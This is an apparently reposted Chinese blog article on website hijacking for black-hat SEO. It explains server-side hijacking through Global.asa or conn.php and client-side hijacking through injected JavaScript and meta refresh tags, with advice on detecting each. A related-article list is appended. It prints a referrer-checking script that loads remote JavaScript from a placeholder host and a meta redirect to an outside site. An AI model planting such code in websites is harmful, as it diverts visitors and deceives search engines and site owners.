网站劫持问题到底是什么意思?怎么才能解决?
网站劫持是目前黑产最喜欢的一种网页引流方式,此手法往往通过政府、教育机构网站(权重高),修改网站源代码、放寄生虫程序、设置二级目录反向代理等实现。网页劫持可以分为服务端劫持、客户端劫持、快照劫持、搜索劫持等等;表现形式可以是劫持跳转,也可以是劫持呈现的网页内容,目前被广泛应用于私服、等暴利行业。
iis7网站监控检测
测网站是否被劫持、域名是否被墙、DNS污染检测、网站打开速度检测等信息。
服务端劫持也称为全局劫持,手法为修改网站动态语言文本,判断访问来源控制返回内容,从来达到网站劫持的目的。
asp/aspx/php劫持
Global.asa、Global.asax、conn.asp、conn.php等文件比较特殊,作用是在每次执行一个动态脚本的时候,都会先加载该脚本, 然后再执行目标脚本。所以只要在 Global.asa 中写判断用户系统信息的代码(访问来源等),如果是蜘蛛访问则返回关键词网页(想要推广的网站),如果是用户访问,则返回正常页面。
客户端劫持
客户端劫持的手法也很多,但主要就是2种:js劫持、Header劫持。
js劫持
js劫持目的:通过向目标网页植入恶意js代码,控制网站跳转、隐藏页面内容、窗口劫持等。
js植入手法:可以通过***服务器,直接写入源代码中;也可以写在数据库中,因为有些页面会呈现数据库内容。
js劫持案例
效果:通过搜索引擎搜索点击页面(执行一段js)跳转到×××页面;直接输入网址访问网页,跳转到404页面。
代码:
today=new Date();
today=today.getYear()+"-"+(today.getMonth()+1)+"-"+today.getDate();
var regexp=/.(sogou|so|haosou|baidu|google|youdao|yahoo|bing|gougou|118114|vnet|360|ioage|sm|sp)(.[a-z0-9-]+){1,2}\//ig;
var where =document.referer;
if(regexp.test(where)){
document.write ('<script language="javascript" type="text/javascript" src="http://www.xxx.com/test.js"></script>;;');
}
else
{
window.location.href="../../404.htm";
}
分析:通过referer判断来路,如果referer来路为空就是跳转到404页面,如果是搜索引擎来的referer里面也会有显示,然后在写代码控制跳转。如果只是控制实现显示不同的内容,可以修改php、asp代码;如果需要劫持搜索引擎搜索框,可以写JS代码来做浏览器本地跳转。当然js功能可以无限扩展,比如可以控制一个ip一天内第一次访问正常,其余访问跳转等等。
header劫持
在源代码中写入以下代码:
1
<meta http-equiv=“refresh“ content=“10; url=http://thief.one“>;;
利用的就是Meta Refresh Tag(自动转向),将流量引走。
手法对比
客户端劫持与服务端区别
客户端劫持:每次访问网页从服务端获取到的网页代码都是相同的,只是控制了网页代码在浏览器中呈现的效果(比如是否进行跳转等)。
服务端劫持:改变了每次访问网页从服务端获取到的网页代码。
客户端劫持与服务端判断方法
客户端劫持的判断方法:只需观察浏览器呈现的网页前端代码,查看是否引用了不当的js,或者其它敏感内容。
服务端劫持的判断方法:可以通过观察网站后端代码,或者通过改变ip,包头等方式,观察放回源码是否不同。
转载于:https://www.cnblogs.com/goodcola/p/11547478.html
网站劫持问题到底是什么意思?怎么才能解决?相关推荐
- 如何很好的解决网站劫持?
通过什么办法得知自己的网站有没有安全问题? IIS7网站监控 测网站是否被劫持.域名是否被墙.DNS污染检测等信息. 解决网站劫持非常不错的办法,先分析下流量劫持后的效果展现形式有几种? 1.A 标签 ...
- 修复运营商网站劫持,Win8.1怎么修改DNS
说到运营商网站劫持,相信大多数读者也是身受其害,今天Win8迷:整理下,Win7.Win8.Win8.1系统下如何修改系统的DNS服务器,以及为自己的网络挑选最佳的DNS,轻松上网. 什么是DNS劫持 ...
- 网站快照被劫持 标题描述被篡改成灰色内容的解决方法
三年前用dedecms织梦系统,帮公司设计了一个网站,平常的网站更新,以及优化也都是我在负责,前段时间发现网站的流量越来越少,用爱站站长工具查看了一下,竟然发现网站快照被劫持了,网站快照标题和实际标题 ...
- 解决ajax劫持,Ajax实现检测网站劫持的方法
这次给大家带来Ajax实现检测网站劫持的方法,Ajax实现检测网站劫持的注意事项有哪些,下面就是实战案例,一起来看一下. https可以彻底解决劫持的问题.但是一般虚拟主机都不支持 https,难道h ...
- 常见网站劫持案例及解析
攻击者在入侵网站后,常常会通过恶意劫持流量来获取收益,从而实现流量变现.有一些黑帽劫持的手法堪称防不胜防,正常的访问行为很难发现异常.今天给大家分享一下常见的网站劫持手法和排查思路. 我们可以按照基于 ...
- 百度又双叒升级烽火算法!一个动作杜绝网站劫持问题!
第一次发现网站被劫持,限制展现一个月:第二次发现,限制展现3个月:第三次发现,永久限制展现,网站基本就废了! 而这次升级主要是将算法扩大覆盖范围,这意味着又有一批自知或者不自知在危险边缘试探的网站将被 ...
- 网站seo优化到底该怎么做呢
企业网站seo优化到底该怎么做?",今天为大家分享这个问题,推广做得好不好,全看你知不知道这些神技巧. 话不多说,一起来看看网站seo优化到底该怎么做吧! 企业网站seo优化到底该怎么做? ...
- 常见客户SEO问题解答:网站关键词优化到底怎么做?
如果客户想专门优化一个关键词该怎么优化? 是专门优化其中一个主词?还是专门优化一个产品词?或添加一个词来优化? 如果已经是网站的主词,针对该词我们需要先查看难度,一般难度可以尝试增加这个词的密度.增加 ...
- 知名软件ADSafe暗藏恶意代码 从众多网站劫持流量
一. 概述 日前,火绒安全团队发现"ADSafe净网大师"."清网卫士". "广告过滤大师"等多款知名软件暗藏恶意代码,偷偷劫持用户流量.这 ...
最新文章
- json字段顺序读取 python_如何利用Python批量读取视频文件的时间长度?
- 【统计学习】假设检验
- 白话 Session 与 Cookie:从经营杂货店开始
- 怎么计算网站高峰期并发量和所需的带宽?
- [转]内存泄漏简单检测
- Quaruts II 增量编译
- ux设计_为企业UX设计更好的数据表
- 西北工业大学计算机毕业论文,光纤通信发射机本科毕业论文 西北工业大学.docx...
- OC extern和变量
- 基于JavaSpringMVC+Mybatis+Jquery高校毕业设计管理系统设计和实现
- 深度-图像风格变换【二】
- RESTful 架构详解设计模式一种约束
- [转]https配合移动端开发
- WebUploader 上传 php 怎么回去返回的图片路径
- 第十三届蓝桥杯C++B组国赛D题——最大数字(AC)
- funnyface表情包制作神奇
- Java--面向对象_中
- 基于Python改变图片像素大小
- 华南理工大学“三七互娱杯”程序设计竞赛 A (dp)
- C#串口通信数据不完整